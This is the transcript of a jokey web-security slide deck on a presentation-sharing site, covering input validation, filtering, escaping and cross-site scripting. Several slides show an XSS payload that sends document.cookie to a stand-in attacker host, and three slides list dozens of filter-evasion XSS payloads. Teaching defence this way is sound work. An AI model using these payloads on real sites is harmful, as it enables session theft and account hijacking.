Basic web application security
This presentation is the property of its rightful owner.
Sponsored Links
1 / 65

Basic Web Application Security PowerPoint PPT Presentation


  • 42 Views
  • Uploaded on
  • Presentation posted in: General

Basic Web Application Security. User Input. Kick Your Arse. Three Ways. (All Awesome). Validation. Passive. (No touchy-touchy). This is a Number. 2. This is not a Number. a. This is really not a Number. <script>alert(‘ loldongs ’)</script>. Filtering. Destructive. (One-Way Street).

Download Presentation

Basic Web Application Security

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


Basic web application security

Basic WebApplicationSecurity


User input

User Input


Kick your arse

Kick Your Arse


Three ways

Three Ways

(All Awesome)


Validation

Validation


Passive

Passive

(No touchy-touchy)


This is a number

This is a Number.

2


This is not a number

This is not a Number.

a


This is really not a number

This is really not a Number.

<script>alert(‘loldongs’)</script>


Filtering

Filtering


Destructive

Destructive

(One-Way Street)


Only letting the good stuff in

Only letting the good stuff in.


Basic web application security

or


Keeping out the bad stuff

Keeping out the bad stuff.


What s the diff

What’s the diff?

(Bro.)


Both can be error prone

Both can be error-prone...


White listing usability problems

What happens when

you screw it up?

White-Listing  Usability Problems

Black-Listing  SecurityProblems

(Always a trade-off.)


Escaping

Escaping


Transport

Transport

Point A  Point B


Data will be the same on both sides

Data will be the same on both sides.


Different media different escaping

Different Media,Different Escaping


Basic web application security

HTML

<b>Huh.</b>

<p><i>&lt;b&gt;Huh.&lt;/b&gt;</i></p>

<b>Huh</b>


Basic web application security

SQL

Sam O’Brien

INSERT INTO mah_peeps (name)

VALUES (‘Sam O\’Brien‘);

1, Sam O’Brien, 2010-09-02 18:30:00


Basic web application security

XSS

(Cross-Site Scripting)


Basic web application security

SS

(XTREME Site Scripting)


Sticking scripts where they don t belong

Sticking Scripts Where They Don’t Belong.

You there, down the back.

Stop sniggering.


Script alert hacked by loldongs script

<script>alert(‘HACKED BY LOLDONGS’)</script>

Amateurs!


Script alert document cookie script

<script>alert(document.cookie)</script>

Hmm.


Basic web application security

<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Oh shit.


Why is this uncool

Why is this uncool?

(Yeah! Why?)


Basic web application security

<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Ooooh shit.


Basic web application security

<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Oooooooooooh shit.


Basic web application security

<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Oooooooooooooooooh shit.


Why is this really uncool

Why is this really uncool?

(Because shut up.)


Basic web application security

HTTP

Hyper-Text Thingy I-forgot-again


Stateless

Stateless


No idea who you are

No Idea Who You Are.


It can guess badly

It can guess.(Badly.)

IP Address

Browser User-Agent


Sends a cookie with each request

Sends a cookie with each request.

(A basket of goodies that the browser sends faithfully every request.)


The server puts a unique id in the basket

The Server puts a unique ID in the basket.

PHPSESSID=123your456mum789

__utma=12948.23.4211414.5553

is_a_furry=1


Browser sends the id every request

Browser sends the ID every request.

PHPSESSID=123your456mum789


Basic web application security

<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Look again.


They have your cookie

THEY HAVE YOUR COOKIE.

Ooooooooooooooooooooooo-


Preventing shenanigans

Preventing Shenanigans


Basic web application security

HTML

Validation Really Hard.


Basic web application security

HTML

Filtering Still Really Hard.

  • Use a library,eg. HTML Purifier.


Basic web application security

HTML

Escaping Dead Easy.

  • Most languages have stuff to handle this, eg.

  • htmlentities(), cgi.escape(), CGI.escape()


How hard is filtering

How hard is filtering?

(It’s just <script>, right?)


This hard

THIS HARD.

<IMG SRC=javascript:alert('a')>

<imgsrc=javascript:alert(&quot;a&quot;)>

<img “””><script>alert('a')</script>”>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;

&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;

&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72

&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72

&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="javascript:alert('a');“>

<IMG SRC="jav&#x09;as&#x09cript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<SCR\0IPT>alert('a')</SCR\0IPT>

<SCRIPT/a SRC="http://foo/x.js"></SCRIPT>

<imgonmouseover!#$%&=alert('a')>

<<SCRIPT>alert("a");//<</SCRIPT>

<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>

<SC\0RIPT SRC=http://foo/x.js?<B>

<script src=//foo/x.js>

<imgsrc=”javascript:alert('a')”

  • (Well, then.)


This hard1

THIS HARD.

<iframesrc=http://foo/x.html <

<body background=”javascript:alert('a')”>

<BODY ONLOAD=alert('a')>

<imgdynsrc=”javascript:alert('a')”>

<imglowsrc=”javascript:alert('a')”>

<BGSOUND SRC=javascript:alert('a')>

<BR SIZE=”&{alert('a')}”>

<LAYER SRC=”http://foo/x.html”></LAYER>

<link rel=”stylesheet” href=”javascript:alert('a');”>

<XSS STYLE="behavior: url(xss.htc);">

<STYLE>BODY{-moz-binding:url("http://foo/x.xml#xss")}</STYLE>

<IMG SRC='vbscript:msgbox(“a”)'>

<imgsrc=”livescript:alert('a')”>

žscriptualert(EXSSE)ž/scriptu (US-ASCII encoding evasion)

<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert('a');”>

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,

PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

  • (Well, then.)


This hard2

THIS HARD.

<DIV STYLE="background-image: url(javascript:alert('a'))">

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a

\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061

\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(&#1;javascript:alert('a'))">

<DIV STYLE="width: expression(alert('a'));">

<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('a'))">

exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("a"))'>

<STYLE TYPE="text/javascript">alert('a');</STYLE>

<STYLE>.x{background-image:url("javascript:alert('a')");}</STYLE><A CLASS=X></A>

<BASE HREF="javascript:alert('a');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://foo/x.html"></OBJECT>

<EMBED SRC="http://foo/xss.swf" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd....jwvc3ZnPg=="

type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

  • (Well, then.)


And one last thing

And one last thing.

(Groan.)


Remember script alert script

Remember <script>alert()</script>?

(Yes, I do. Shut up.)


Alert can be any javascript

alert() can be ANY JAVASCRIPT.

(Yes, and...?)


Do you have any forms on your page

Do you have any forms on your page?

(Yes.)


Do you have any javascript functions your site uses to do anything useful

Do you have any javascript functions your site uses to do anything useful?

(... Yes.)


Do your site make any ajax calls to do anything useful

Do your site make any AJAX calls to do anything useful?

(... Oh.)


That injected code can trigger forms run javascript functions or make ajax calls

That injected code can trigger forms, run javascript functions, or make AJAX calls.

(... Oooooh.)


Send someone to a link that looks like http my site user script dostuff script

Send someone to a link that looks like:http://my.site/?user=<script>doStuff();</script>

(... Oooooooooh.)


Or store something that will output this on someone s profile page script dostuff script

Or store something that will output this on someone’s profile page:<script>doStuff();</script>

(... Oooooooooooooooh.)


And you re hosed

... And you’re hosed.

(Shit.)


The human element

The Human Element

Touchy-Feely Commie Bullshit.


Basic web application security

a

Touchy-Feely Commie Bullshit.


  • Login